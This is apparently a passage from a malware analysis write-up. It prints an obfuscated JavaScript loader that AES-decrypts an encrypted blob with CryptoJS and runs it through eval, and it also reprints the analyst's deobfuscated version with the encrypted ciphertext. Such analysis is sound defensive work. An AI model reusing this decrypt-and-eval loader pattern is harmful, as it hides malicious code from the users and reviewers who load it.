u00AA\u00D0\u00BE\u0068\u0022\u00C0\u00E3\u0073\u00A1\u0006\u00BE\u00DB\u00C3\u0015\u0048\u0093\u0036\u0043\u0046\u009C\u0024\u003F\u00FA\u005B\u003B\u0015\u00EA\u00EF\u00C1\u0060\u00A1\u0096\u00DD\u0019\u0099\u00F1\u000E\u0075\u00DC\u0010\u004F\u0084\u00EA\u00F9\u0064\u000A\u0093\u008F\u004E\u001D\u00F8\u00A8\u00E3\u0016\u003F\u00B8\u001C\u0069\u00FC\u007E\u00E5\u0067\u003F\u00B9\u00A7\u00E9\u008A\u0054\u0008\u0069\u008E\u00F3\u000F\u0099\u0078\u0089\u00E0\u0009\u00CE\u00C7\u00F9\u000E\u00AA\u009E\u00C4\u00DF\u003B\u0065\u0028\u0099\u0055\u0064\u00A0\u0065\u00CF\u006F\u001A\u008A\u00DE\u0060\u00EA\u00D8\u00FA\u00D1\u007F\u00F4\u00CA\u00CA\u00C7\u00D1\u006C\u002B\u00AF\u00C7\u00C1\u00A8\u009C\u00EA\u000D\u00B9\u0058\u00FA\u00BC\u0093\u002B\u006F\u00C8\u001C\u0012\u003B\u0071\u0063\u0023\u007B\u00EB\u0090\u0078\u0034\u0064\u009C\u0031\u00BF\u001B\u0042\u00CF\u0051\u00A7\u003E\u00A1\u005F\u0075\u00F3\u0026\u009B\u0000\u00D5\u0026\u00FE\u0077\u0038\u0085\u000C\u00E1\u00DB\u0096\u0020\u00C3\u0005\u00A0\u009E\u00BA\u0035\u00DD\u005D\u0011\u0095\u0020\u000F\u00DC\u00E0\u003F\u00C7\u0052\u00AB\u00EC\u0001\u00C0\u0021\u00BB\u0087\u0030\u0033\u00F1\u00A7\u008E\u0062\u00BF\u002E\u0076\u0050\u00CE\u005C\u005C\u0045\u008C\u0069\u00B9\u002C\u0084\u0080\u005F\u00DD\u00B9\u0030\u004D\u005C\u00FD\u002A\u00CD\u0003\u00AD\u00EF\u0088\u00C8\u005F\u0008\u008F\u00EF\u00EE\u0049\u00B6\u00C2\u00A3\u0094\u00BB\u00F1\u002A\u002E\u003F\u00C0\u006C\u0048\u00D2\u0056\u00E0\u004A\u0008\u004F\u0051\u00E3\u00C5\u0094\u00D7\u00E1\u004A\u0021\u000C\u0041\u0007\u0086\u0044\u00CA\u0019\u00E3\u00D8\u0095\u00A0\u00FE\u009E\u00C2\u00E1\u005E\u00BF\u00BB\u0002\u00A4\u0002\u006E\u0048\u00B6\u002C\u000B\u0067\u0072\u0062\u0002\u00B7\u00F3\u0042\u0082\u008C\u00E6\u0049\u00AC\u00F7\u0028\u00BE\u003C\u00E3\u005D\u0057\u00F3\u0073\u00F8\u0010\u00A7\u004F\u0099\u0062\u0029\u003D\u0015\u009D\u00C9\u008B\u00D7\u0001\u00C6\u0089\u0099\u00DF\u00B8\u00FA\u007F\u00AB\u0089\u0064\u0055\u0060\u0062\u005B\u00D1\u00E6\u003A\u00B2\u00DE\u0045\u00BD\u0083\u0018\u007D\u00DC\u00F0\u001E\u00DB\u00C1\u00D1\u00ED\u0041\u0010\u0057\u00D1\u0096\u0032\u00CA\u0022\u009A\u0060\u00FD\u0043\u001B\u00A8\u0073\u0082\u0041\u0037\u0002\u008F\u005B\u00CB\u0077\u001B\u0073\u003C\u0072\u00CD\u00E8\u007E\u008B\u0015\u0058\u00D5\u0010\u0003\u008A\u0015\u00C1\u00D3\u0050\u002C\u0065\u00F0\u00CE\u0020\u00E6\u005A\u009E\u00B7\u007C\u0010\u00BE\u0042\u0045\u006F\u00DC\u002E\u00D6\u00F8\u00BA\u0019\u005A\u00AB\u003C\u0025\u00C2\u008C\u0059\u0034\u009C\u0067\u00B2\u0093\u00DF\u00E7\u0095\u004F\u00B8\u0046\u000D\u0096\u0015\u002C\u00D6\u0004\u0079\u00FA\u0070\u003E\u00AD\u00FE\u0023\u0027\u00C3\u00F6\u00D1\u00D7\u00D5\u00F7\u00BD\u0048\u00CF\u0014\u0010\u0097\u0062\u00A3\u005E\u002B\u0093\u004E\u007B\u00F9\u00D4\u00D3\u0064\u001F\u00D7\u00F7\u0018\u00C0\u0083\u00A1\u00AC\u00C1\u00F0\u00BB\u0035\u006F\u0007\u0032\u0060\u003B\u00CB\u00D8\u0051\u0042\u00FC\u00F1\u0026\u003C\u0098\u0043\u006C\u00D1\u006E\u00B7\u0024\u0042\u00CE\u0016\u004D\u0040\u0010\u003D\u0092\u00A8\u00AB\u00C6\u00D0\u0078\u00EF\u0079\u003A\u0069\u0018\u002E\u00FE\u0089\u0023\u00FA\u0085\u00B7\u0052\u00F3\u007D\u006E\u00C3\u0092\u007A\u00D0\u005B\u008B\u00DD\u007C\u00DC\u002E\u007E\u0092\u00D0\u0065\u0008\u00CE\u00DF\u00FE\u00CC\u003D\u00C0\u00A1\u00C2\u00D6\u0020\u0005\u00A3\u0066\u00DD\u00CD\u00CC\u00E4\u0063\u00E0\u00DD\u00F3\u0018\u000D\u0075\u0007\u006D\u0066\u000A\u00AD\u00D2\u008C\u008F\u00B0\u0006\u00C8\u00C7\u00B1\u006B\u00DC\u00CC\u00C0\u00A1\u0065\u001D\u0072\u00BC\u0012\u0044\u0093\u000F\u00C0\u00A8\u00F7\u00B9\u00A9\u0091\u00B8\u0049\u005D\u00C7\u00B5\u002A\u0018\u0041\u004B\u0040\u0036\u009C\u0046\u0002\u00A6\u00C1\u0035\u008D\u008D\u00D0\u008F\u00ED\u00BA\u00CA\u0072\u0089\u00DC\u004A\u0008\u0067\u006F\u00F0\u0009\u0089\u00EE\u0012\u00C0\u0045\u0094\u003D\u00B4\u006F\u0069\u0047\u00C4\u005D\u00B8\u00E1\u00BC\u00E8\u005B\u0020\u00D1\u0080\u00B2\u00DC\u0026\u00CB\u0007\u0031\u0095\u0006\u002F\u000F\u0052\u0051\u0065\u0001\u00B0\u00ED\u00B2\u0011\u0029\u00FE\u0017\u0087\u00B3\u002B\u00BF\u0002\u0019\u00A1\u0034\u0048\u00C3\u0075\u004C\u0099\u00AE\u00D7\u00CC\u0048\u00F3\u00D5\u008A\u0021\u00E5\u00BF\u00BC\u00B5\u005A\u00E6\u00D7\u0014\u00E3\u007F\u0024\u005C\u00EE\u008A\u006B\u008C\u00F1\u004C\u0044\u0091\u004E\u00E5\u000D\u00E7\u0090\u0081\u006B\u00E7\u00B6\u008A\u00CB\u00BB\u000B\u006B\u0051\u0036\u00F1\u0095\u0031\u0049\u00EE\u00A6\u008D\u004D\u0070\u00D1\u0031\u003E\u00A8\u005F\u0099\u0084\u0091\u00C4\u0035\u00FE\u0090\u00CF\u0086\u00C2\u001E\u00E0\u0093\u0069\u0031\u0040\u00B8\u0005\u00CE\u00F2\u00C7\u00CF\u0017\u0053\u00A7\u00B5\u0090\u0098\u0065\u005C\u00D8\u00FF\u0041\u00B3\u00FB\u0017\u004B\u00F2\u003A\u00B5\u00C8\u0067\u00AE\u0064\u0092\u0061\u00FC\u005F\u00E3\u0040\u00B8\u00FC\u000C\u00AB\u0058\u0091\u0049\u0069\u0089\u00A7\u0015\u0038\u0048\u0076\u00D8\u007B\u0067\u006C\u00AA\u0095\u00F6\u00E0\u0068\u000D\u0072\u00F9\u00E4\u0092\u0071\u0075\u00EE\u00F0\u00AF\u0069\u009D\u0061\u00BF\u009C\u00DE\u00A7\u00DD\u00BB\u00CB\u006F\u003C\u006B\u0083\u00EF\u00FA\u005A\u00FC\u00FF\u0093\u0097\u00EB\u0053\u0026\u00F7\u00A7\u001B\u000B\u004A\u00D7\u00AA\u00D8\u00B2\u003D\u00DC\u0086\u003C\u00BB\u005A\u00D5\u00B0\u00CB\u0061\u00F1\u0012\u00B5\u003F\u00A3\u0038\u00EC\u00DE\u0049\u00F2\u00F7\u00B6\u00BC\u005E\u00DA\u0008\u002E\u0053\u0060\u00E8\u005B\u00C7\u00F4\u0013\u00BA\u004E\u0066\u0033\u0051\u0088\u00D1\u00C1\u0022\u000E\u00AB\u0084\u00BB\u002E\u0097\u00EB\u002D\u0075\u0008\u0025\u0037\u0078\u005E\u00F2\u0087\u0048\u0067\u00B9\u0088\u0031\u009C\u000D\u008A\u005D\u0051\u0081\u00C8\u00D5\u007D\u00A2\u00FB\u00BC\u00DC\u0008\u0042\u002D\u00FE\u00EA\u008F\u002F\u00F1\u002F\u0081\u001D\u0069\u0010\u0021\u00C3\u0081\u0054\u0040\u0085\u006B\u00D1\u0028\u0029\u007D\u0081\u0059\u00B6\u006F\u0008\u0044\u00F9\u00F6\u00B2\u0079\u0091\u0077\u00D4\u0040\u00C8\u0085\u0037\u008A\u004C\u0034\u00D4\u009A\u002F\u00F0\u0058\u00F6\u0014\u000E\u00FA\u00B6\u0094\u0089\u00BA\u00E5\u00E3\u0058\u0072\u00E5\u0033\u0087\u003F\u00E3\u001E\u0030\u0021\u00FB\u0034\u00C8\u00E0\u0044\u007E\u003A\u00CF\u00C8\u002D\u00BE\u00A4\u009B\u0060\u004C\u0077\u00CE\u001D\u0053\u001E\u00CE\u00D5\u00E4\u0032\u00B4\u0032\u004A\u009F\u00D1\u00E4\u0068\u000F\u00C9\u007B\u0098\u00F4\u0074\u002E\u0001\u00F4\u0082\u0097\u00D6\u000F\u0082\u0006\u0049\u0016\u00BF\u0077\u0057\u00B7\u0088\u0019\u0087\u00E4\u0092\u0036\u0036\u0076\u0075\u002F\u0028\u0093\u008E\u0089\u004B\u0068\u008F\u0091\u0097\u00BC\u005F\u003C\u00EA\u008D\u0094\u00D0\u00CC\u0050\u00D8\u00C1\u009A\u0074\u009F\u0064\u00CB\u0014\u0089\u0019\u0044\u00EB\u004E\u004A\u00CF\u009A\u0007\u00FA\u0087\u0009\u006E\u00CB\u00CF\u00FD\u0025\u0099\u00B7\u00A3\u000C\u0054\u0029\u007F\u00CA\u007F\u00BD\u0080\u005C\u0071\u0067\u009D\u0040\u002E\u008B\u005D\u0074\u006E\u0091\u0092\u0035\u0093\u00F4\u000A\u00E0\u0031\u00D2\u0039\u00EE\u00BD\u00D7\u0063\u00F6\u0096\u0062\u00F7\u005F\u0086\u0051\u0052\u00DE\u0021\u002E\u0095\u00F0\u0058\u0056\u0080\u004C\u00D9\u0062\u0088\u009B\u0095\u0046\u00F7\u00D8\u00B7\u0076\u0083\u00C0\u00ED\u0014\u005D\u0041\u00CB\u00BE\u0011\u00D6\u0014\u00CF\u0030\u008F\u006F\u0032\u00A6\u002D\u0017\u0075\u00AA\u0011\u003C\u0009\u00F2\u00C7\u00BB\u00CF\u00C9\u00C3\u0052\u00CD\u003F\u0067\u0011\u0002\u00F2\u0002\u006B\u00B5\u000E\u00DE\u0048\u003A\u008E\u000C\u00A2\u00E4\u00BD\u00BF\u0095\u00D9\u007B\u00CF\u007E\u003F\u0082\u00B0\u0041\u00AC\u00AC\u0091\u004B\u005A\u0038\u0039\u001D\u00D4\u00CA\u00E9\u0080\u00CD\u00DA\u00E5\u0018\u00D1\u0047\u00FA\u007E\u00E4\u00EA\u00D9\u0084\u0043\u0099\u00BF\u00A7\u00D8\u00B7\u0005\u004E\u00DF\u0054\u0060\u0080\u00E5\u0048\u0044\u00E5\u00D2\u0057\u0093\u00C7\u00F7\u0020\u0020\u0027\u0052\u000F\u00CD\u009C\u00D2\u006A\u00E2\u0007\u00E9\u0005\u00A0\u00D1\u00AC\u00F7\u00C8\u0001\u00E9\u00C8\u0046\u0099\u0086\u0065\u00B4\u001B\u007E\u007E\u007C\u00F1\u00B9\u00E9\u0063\u00AE\u0044\u00FD\u0070\u00C5\u00D8\u001A\u00D8\u0099\u00A5\u0043\u00D4\u00A9\u001E\u001D\u0060\u000F\u0023\u0020\u00D6\u00FD\u000D\u00BF\u00EE\u0066\u001E\u008B\u0095\u009F\u0072\u00E1\u00A1\u0006\u0097\u00DF\u007C\u00FA\u0086\u00E2\u00D9\u0014\u0097\u00F1\u00D0\u003C\u008F\u0026\u004F\u003A\u00E4\u00CD\u0000\u00EC\u000B\u006E\u000E\u0021\u00F3\u00F1\u0058\u002A\u0028\u00CB\u006B\u00B6\u0001\u000F\u0012\u0078\u00F4\u0092\u008F\u00B8\u0098\u0096\u00E8\u00A8\u0015\u000F\u004F\u007C\u0084\u001D\u0062\u00EF\u00B4\u00CD\u00A6\u0049\u0039\u00CF\u003B\u00BB\u0071\u0050\u00C2\u00CE\u008A\u0058\u00FA\u0034\u00C0\u001F\u005F\u007A\u00E6\u006C\u007A\u00C2\u0057\u0043\u00A6\u0016\u0053\u0026\u0060\u00A6\u0053\u009E\u00E2\u00E9\u0047\u0048\u0089\u0095\u00F2\u00BE\u007E\u006C\u004C\u00E6\u0003\u0024\u00AC\u00EA\u004E\u00B2\u0037\u0049\u002C\u00B1\u00B9\u00C1\u0085\u00C9\u00EA\u00D5\u0057\u003A\u000F\u0012\u00A6\u0018\u0033\u00C9\u0069\u00DC\u000A\u0001\u002B\u008E\u001C\u00EB\u0031\u0033\u00F8\u006D\u0059\u00C0\u0075\u00E9\u0056\u009F\u0073\u0093\u0018\u00B4\u00E7\u0078\u00C3\u001A\u0072\u0030\u003F\u0068\u0066\u00F6\u002B\u001A\u0094\u0004\u0044\u0067\u00A5\u009C\u0038\u0099\u00DA\u0010\u0008\u00C6\u0017\u00E3\u0061\u00D1\u005D\u00B5\u00E2\u009D\u00C6\u0087\u00FB\u003D\u00A9\u0028\u0018\u000D\u007D\u00FA\u006C\u00D2\u00B9\u008D\u000E\u007E\u0092\u0095\u0072\u003E\u00B5\u007B\u00AE\u0097\u0005\u00E5\u005D\u0090\u0003\u0091\u009C\u0053\u00E1\u008B\u00E5\u00A5\u00F6\u00E9\u00F3\u0077\u00C9\u00AC\u0010\u0064\u00F2\u00EF\u00B4\u0060\u0080\u007E\u00CF\u00FB\u00A4\u0038\u0025\u0032\u00A5\u00CE\u0046\u00DD\u0087\u0054\u0077\u0036\u006A\u0049\u0024\u00BC\u0012\u004D\u0027\u0039\u0062\u0034\u00D7\u006D\u007F\u00C5\u0026\u0072\u0068\u00EE\u00DD\u00FA\u0092\u001C\u006E\u00CE\u005D\u00F8\u00F5\u007B\u00FA\u0022\u00D3\u004D\u0052\u007F\u00AC\u0074\u005F\u002A\u0045\u004C\u0043\u0068\u0066\u002C\u001D\u006A\u003C\u0000\u0077\u008C\u006D\u00FD\u0038\u0012\u001E\u00D1\u0098\u00A7\u0093\u001B\u00B6\u00E8\u00A3\u00F1\u007C\u0099\u00E7\u0077\u0012\u00CA\u0061\u003F\u0017\u0041\u0027\u00E2\u00E6\u008D\u007C\u00E9\u00B0\u006E\u0099\u00D1\u00B9\u00DC\u00CD\u00DE\u001B\u004A\u00F5\u0026\u007C\u002A\u0064\u008C\u008D\u0068\u00FF\u003F\u0073\u003B\u0082\u0098\u0089\u0079\u0098\u00B2\u00A1\u00B8\u0037\u0004\u00F4\u001F\u00EA\u0000\u0015\u003C\u0053\u002A\u0073\u0051\u0073\u00F9\u0018\u00A5\u0034\u0080\u005E\u00BE\u000C\u00E9\u00D4\u00ED\u009A\u0023\u002C\u0036\u004C\u00D5\u00D5\u009E\u0031\u0085\u0001\u00DA\u0043\u002D\u00FC\u00B4\u00B9\u00C9\u006F\u00EA\u0031\u0051\u00F4\u00DF\u0039\u0058\u008C\u0053\u0070\u000F\u0040\u00FA\u00E2\u0084\u00DB\u0016\u00A4\u000D\u006A\u0074\u0068\u0068\u009B\u0056\u002D\u00CC\u002B\u0054\u0026\u00F8\u00DB\u00AC\u00AF\u00A7\u00FB\u0001\u00A8\u00CF\u0036\u00F6\u0095\u0072\u00B4\u00B2\u0054\u005F\u0099\u00BB\u00CC\u006C\u0060\u0087\u007C\u00AA\u001B\u00CA\u0001\u00CB\u0097\u0050\u00B7\u002C\u001C\u0085\u0049\u0012\u0056\u0011\u00CC\u0021\u0096\u00E9\u003E\u0071\u008A\u00B7\u0090\u0087\u00D1\u0043\u00B7\u0028\u00EF\u0091\u0065\u00C7\u008F\u005B\u005E\u0004\u00E8\u0082\u0084\u00E1\u0036\u0024\u00B9\u00DB\u00FA\u0058\u001C\u003C\u005D\u0078\u00E4\u006C\u00E9\u00F5\u0013\u0020\u00E7\u0009\u00E0\u0016\u0062\u0024\u0042\u00CD\u005B\u001E\u00B7\u0020\u003D\u00C3\u000B\u00DD\u005A\u0040\u0031\u0089\u00C5\u0022\u00F6\u003E\u0054\u0052\u00C1\u0099\u0043\u00BF\u00C2\u00A4\u0038\u00CA\u00C4\u00B9\u0069\u0044\u00DE\u0016\u0085\u00A9\u00CB\u00F3\u0098\u0043\u00C8\u00C1\u000F\u004F\u006B\u0010\u0025\u0000\u00F3\u00C1\u00EC\u008E\u007A\u00CB\u00D3\u003F\u00AA\u00F7\u00C4\u007E\u00E8\u00BA\u0009\u005B\u001A\u0078\u005E\u0017\u0001\u00C3\u00B1\u00A2\u006B\u002B\u0043\u0014\u009F\u0016\u0013\u00D0\u0032\u007F\u00F8\u00FC\u006D\u00A1\u0026\u00F9\u0093\u006D\u0027\u00F8\u00C2\u008B\u00E3\u00CA\u0001\u003B\u0017\u0084\u005C\u0036\u0092\u00A9\u0088\u00D3\u0042\u0027\u00D8\u001F\u008F\u0021\u0013\u00D0\u0008\u0020\u00D4\u000D\u0088\u00F8\u0045\u00F1\u0089\u0088\u0013\u0017\u005B\u00C7\u0031\u004F\u0023\u00DB\u002F\u0055\u0032\u009E\u0098\u0052\u00C6\u004D\u00B6\u00D8\u007A\u0032\u00F4\u002D\u00A7\u00E8\u0086\u0066\u003C\u00EC\u004C\u0076\u00F7\u0020\u00E0\u004C\u0088\u0054\u000B\u0030\u00F8\u00FB\u00CA\u0050\u003B\u0099\u008D\u005B\u00D0\u0036\u005F\u002C\u003F\u00BC\u0068\u007B\u0045\u00B9\u00A3\u00E4\u0081\u00D7\u00B9\u00CB\u00EB\u004B\u00F2\u0085\u00EA\u0027\u0065\u000D\u006D\u0074\u00F5\u007B\u00C5\u009E\u001F\u001C\u00CD\u0010\u000B\u0079\u00C5\u0027\u00D4\u002A\u00D8\u001F\u0057\u0001\u0017\u005A\u004A\u005A\u0043\u00B4\u00A6\u0059\u00E0\u00FB\u008A\u0009\u00BC\u00E4\u005F\u0047\u0092\u00B7\u00AD\u002C\u0052\u0073\u000B\u008D\u003B\u0071\u00B2\u00C0\u00D2\u0029\u0031\u0028\u00D7\u0009\u0075\u00F8\u00CF\u00ED\u009B\u007A\u0063\u00D8\u005C\u00B9\u00AA\u00A3\u0018\u0055\u00D6\u0070\u00E3\u002B\u0089\u004E\u00B6\u001E\u00FC\u001B\u00D7\u0056\u003B\u007F\u00F2\u00B8\u00BB\u00FF\u0088\u00B6\u0006\u0009\u0008\u009C\u0069\u0020\u006A\u00C7\u0093\u0091\u007C\u006B\u006A\u00C9\u00A4\u009D\u0080\u006B\u006D\u0031\u0010\u007D\u004E\u0062\u0047\u000E\u00C7\u0082\u00D0\u00A1\u0098\u009B\u0047\u0077\u0042\u00C7\u005A\u003F\u00F9\u005F\u0070\u00AF\u00EE\u0086\u0096\u00B8\u00A9\u0026\u008B\u00BC\u0008\u002B\u0014\u00C4\u0084\u000F\u0052\u0026\u000B\u0027\u0084\u006B\u004A\u00F9\u0040\u0002\u00C7\u0022\u0065\u003A\u0079\u0049\u0005\u0083\u00EA\u0001\u0043\u00E4\u001F\u00C0\u00AB\u0036\u007E\u0061\u0010\u002E\u0005\u002D\u00F7\u008B\u0046\u00D0\u009F\u0010\u00A2\u0067\u00BB\u0094\u00CD\u000E\u00A1\u0049\u00E2\u0082\u0043\u009F\u00A9\u00BA\u0051\u00FF\u0060\u00F4\u0063\u006C\u00E4\u0007\u009B\u00A2\u0069\u00DB\u00AA\u00F0\u008B\u0080\u00D5\u00CE\u008F\u006A\u0076\u0082\u0030\u0034\u00B1\u009E\u009E\u00D2\u009F\u00AD\u008C\u00B1\u00EB\u0063\u00DC\u00F2\u0047\u0028\u00AC\u00F4\u00EF\u0054\u003B\u0066\u00B1\u0005\u00FF\u008C\u007B\u001A\u0011\u002F\u001A\u0074\u0048\u0024\u0046\u0047\u008A\u0032\u00E6\u00F4\u0042\u00A8\u0099\u00EF\u0016\u0040\u00D2\u00F2\u0093\u00E8\u0066\u00F3\u000E\u0058\u00E1\u00A5\u00D8\u00B5\u00EC\u00F5\u0040\u009F\u0016\u0017\u00EC\u0065\u0019\u000D\u001D\u00E6\u00D7\u006E\u006B\u0009\u007C\u003F\u0007\u00D3\u00C8\u00F9\u0017\u009E\u00E7\u0074\u005E\u00AA\u0083\u00EA\u00A9\u0005\u00E9\u0033\u000E\u00DB\u00D8\u0081\u0097\u0089\u0060\u00B0\u00A3\u00DA\u0068\u009F\u001B\u00CC\u0054\u003B\u0035\u009F\u00F4\u008D\u0062\u00FB\u00F5\u006D\u0090\u00C5\u00E0\u009D\u00CD\u0080\u0030\u00DF\u0042\u0073\u00AE\u0033\u00A5\u0015\u009F\u00D9\u0008\u0056\u00B0\u0096\u00C4\u002F\u0040\u002A\u00B6\u00B0\u0053\u00B7\u00AB\u0021\u003F\u0054\u00C7\u006A\u00A5\u00BC\u0068\u009D\u00CC\u00B0\u00A3\u0004\u0019\u004B\u0027\u006C\u00A1\u0035\u0028\u00D1\u0057\u006A\u0066\u0054\u0047\u00E0\u007C\u0039\u0013\u0079\u0056\u006B\u00CE\u001E\u00CB\u0006\u0082\u00AB\u000C\u00EC\u0099\u00A3\u00A0\u00B9\u00BD\u00A9\u009A\u0062\u00F1\u000E\u0041\u00DC\u00CF\u0069\u0076\u00B0\u006D\u00BA\u00F6\u00D1\u0049\u00F9\u001F\u004D\u0031\u0095\u00C5\u00BC\u0013\u0071\u00D0\u00D5\u0063\u00B4\u0027\u00A6\u0019\u0051\u0002\u004B\u00E2\u0086\u0026\u00EF\u003A\u00B6\u005B\u00B5\u0032\u00A8\u0049\u00D6\u00F3\u001E\u002C\u0035\u001E\u0000\u007A\u007C\u006B\u0075\u0036\u00F9\u000F\u00AB\u00A3\u00B2\u00BD\u004E\u00F1\u0049\u0011\u00DC\u00D0\u00AC\u0074\u00B9\u0009\u00EF\u0029\u00B4\u0075\u0002\u00DD\u0058\u0018\u008C\u0000\u0006\u00BE\u005D\u0041\u008F\u0073\u004C\u00EC\u0029\u000D\u00D1\u009F\u003D\u00CC\u00F3\u0001\u0039\u0038\u00D8\u00A5\u0054\u0044\u005D\u0072\u0098\u005F\u00CD\u0092\u00A1\u00A3\u00AF\u00D3\u0086\u00F0\u00BC\u006B\u00E5\u00F1\u0008\u00CE\u0053\u00B5\u00D2\u0055\u00C6\u0019\u0052\u0040\u003E\u005E\u008A\u00EC\u009C\u0012\u002C\u00D5\u00EA\u000B\u00C6\u0057\u0040\u0060\u008B\u00E8\u000F\u001A\u00A0\u008C\u0021\u00BC\u002A\u003B\u0028\u00A2\u0077\u00A3\u00EB\u00E6\u0035\u0068\u0024\u0098\u00AA\u00FD\u007F\u0096\u004B\u00EB\u0054\u0049\u0060\u00B2\u0055\u00BF\u001F\u006C\u0013\u006B\u00AA\u0010\u00BF\u00EC\u00B2\u00B9\u00A9\u0029\u0086\u0068\u008F\u0037\u0046\u0017\u0001\u000E\u000C\u0062\u0010\u00C5\u00F4\u0089\u00FD\u0045\u009F\u0026\u005C\u003F\u005C\u0027\u00F3\u00BF\u009C\u00C9\u0066\u007E\u005B\u0043\u0016\u00DA\u000F\u0097\u0070\u0065\u000F")))},CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("\u00DB\u00ED\u0098\u006C\u00B1\u0089\u00A1\u0047\u0095\u00F2\u008A\u00B3\u0017\u00AF\u004C\u002D\u00B2\u0007\u0037\u0029\u00CF\u0054\u00BC\u0093"))),{iv:CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("\u00E4\u0075\u0026\u0014\u00CA\u004A\u0037\u002F\u0038\u0009\u00FC\u00C6\u000D\u0009\u0030\u008A")))}).toString(CryptoJS[_$_9b39[4]][_$_9b39[5]]));

Deobfuscating it with deobfuscate.io and some manual work, several sections of the suspicious JavaScript can be identified. Essentially, the main function of this JavaScript was to decrypt and executed the base64 encoded payload using AES encryption with a dynamically generated key/IV.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
var _$_9b39 = function (n, w) {
  var r = n.length;
  var j = [];
  for (var e = 0; e < r; e++) {
    j[e] = n.charAt(e);
  }
  ;
  for (var e = 0; e < r; e++) {
    var d = w * (e + 439) + w % 33616;
    var a = w * (e + 506) + w % 38477;
    var v = d % r;
    var p = a % r;
    var x = j[v];
    j[v] = j[p];
    j[p] = x;
    w = (d + a) % 3525268;
  }
  ;
  var c = "";
  var q = "";
  var m = "%";
  var t = "#1";
  var o = "%";
  var u = "#0";
  var k = "#";
  return j.join(q).split(m).join(c).split(t).join(o).split(u).join(k).split(c);
}("Ats8ep%%e6Sr%prB%feUseEynatcc4%ad", 1198358);
;
;
;
;
;
;
;
;
;
;
;
;
eval(CryptoJS[_$_9b39[1]][_$_9b39[0]]({ciphertext: CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("bû3ÀÜ\\Qbð#S=\"ÔIšõ[@ÓK¬È5		fZ†ƒ~=ÊæÍCí¹ VÓ#¬ùž$¾ßJ×0d¾ÉC'pÝPk§™ª¼ºÃ1^ç$ÃeiÛ¡¨y“àV½Ä•¡’\nF{Ëv¶Kì¯p˜K3@ðtaùv	¿Zz¾¶I[((ÝC’ŸÖC¡ƒ+¸æk;,\nÙx^è’çý(yFMît·ý”©„æ… ¨á§DšL!PV‹ÌªïveÍ!uAoËn¥Uô3C\nƒ\\ôÙ%Š˜:ƈáv5ïùÔ½NH(Vi@<±†žáÙ¾„^\"T&þ\"؃‰ôuxRœÚ˜7ºF¦­ˆÔ¶¿/aɚVH…€m1fùú/ñ6y ç²/¶¹§¬—Å‹ÊZŠš3>†oCvg\nЛ¡»/&Ê0ë#“ǬWs/(J¥ìÑ[Ew0G—Ä;Ëé3é{öѤ\nªŽA^ú«ôh‡Èœ¦7ƒì!Vر•̍#t/{…7lØÈj:³q)¬¹Mï—øâDå¿üSÏ&ÎòFYM‹ñ,‰áV@X¨¬›òc†…sŸ´µ³A7ø4œôˆYЎJµÆfDB&òøu¥lA¸aÔè‰Ý‡‡ɓü}~åHC..Mæxú¡÷•ì³o:ϧ¿óQ”‹| 0›Àþ;RA˯⨣'uÞ¨ÿ\\T‹iõ{ Ïey¶ü™7C|ÍhæÓ焓ˆ¸@8ÊC”½v¯\rڝI_>¢óÕEøÝWSDkž;§ßJ@”€ìè›æ@yW ŸÿBmWU¡?‘n×÷¢‰òz\rˆ^Î-ÅÃq*z=œõÀÊ-iK[aÍUœÆæû8¡ûѺb¾1rïÀÖVÿÚþʁr¼%y¸UÅqŒÔY0\"ÌÈ][w	¢8T?¼Í9ÞFWEÿ/,2ê)5¡‹÷HÖ\nLŸD“Ò+#ù\"DÖa—¯KÜ3ó¡úPÎ$†ÉEa§¼t–X‡¶Ôj‡»'ضE}0—‰]4#B[= ó2ê@k#ê©=l›z–Ê#̜ƒX˜_‹H‘ϏÐO’vÀxr\rq\"c¶}éÓK§í÷«-¹ò‹é/bî<@À§e¹/žÜä¼ýç#,f\n$Œò䮣Áh}XÕG[\n*¶A:¨ݑ|]ḇú	¸ÁD]n}’4v·ÔžYLÍ-G ê*˜9¥ßAÿÆ;à%ôÀû[8ú17ºnۚ½tOG9¸Gö¿ç)J1ȟ™Eš´ÿ	R¼þÃj’}ä¨~Tˆ²XõÝDTùgr°ÝöGÃÕ£®<Q>Þ¼Ae$gEu.†¯7͋bciÄ;e÷ŠÉCü^€XF*YtÐAÓi'ES§ôe<ÕΎfw¡Ø;êT?;î轶@þ	qÚÔ>ebñÊësa¤¶k‚ªÚÚú{“^S€IŽíïX]Alˆˆ…¦M¨…IBjÚlÍÝÃI÷äII'ä¨Eiõ\n	EͼuGšV¾*&Àè|N\r;躘bGìÔ­=”‹ #T©\"éÝzFÑ\"t Ko™?N±ցÙ=™†êD`MH9™ØÔ)ŸâVäI£œV®¬R‰Øû~xm¯ée ¤À}À…rÏûÝùç—H=í¨Uúpó4áÄ\r¡U9¾pxQ0º#ÂøoE˜µ¾¥1x—x¸.Ài7™ã}%+ï­U”âŸx)§gYj€¤½®qWCIÔ4­iã…+c»§ß\\Æv?نµÔ•Ødäúø8#æ¨\"¶GÝ^Ö΄>ˆ¥ÇqN	Ê#¦xýÂS?þ¡+QæÿÅEsºaJ®ÈÏ6Dþr¿±\\QëÉó ¸qúFÔr‚”Eªöâ¡Œ\n‚I>“ˇË霰06z¦* Û±žŽ¨Ž[[™ê.«\r]£ èÊׁ=/9ƒok\r:%ÌîÞl7}Dbb3G‚Ù\r£•áõCó¤ónq!֞€çv4¬!+ÓÂòr+ƨCöÙ¹Og—“{@ ü?Ó­ynéŒÇê§	T0ˆDaÜöWŀ&34yœ!¼§2ƒ×‚Ê)1…1E	Ùø%Øäú¸¥›“üæ/ð£!äqé'zpr×-â§H÷Ÿrâǔ©Ôç’ñv1çÓ‡ïÔØÅÿ‹éAêé-Zl¨Žvrr<æ¡Çï»Un0ävùú,d®\r—Ø@ZÄ9äjµaþºpZ:3‘öâávˆ³h2Ì@ûå)ŒRüË\nßìûª4<¡Ô¡KÇroÏ×.ɵ–Æ9E¢‡xR耆‘‚¬åO@îô%Ž¸ÒR(íå)Ýv\n¹?Øë<Ú¡Znžj4*qƒ\\⹨GF©^VˆS>í(æPª•Ã-ÁˆN%}˜[0¡<ü{Ñɳ .e€4„\"ÔyS}Ð[¢`›½\nm›}Õ¦gÈn|kÈ\rä&.¿D	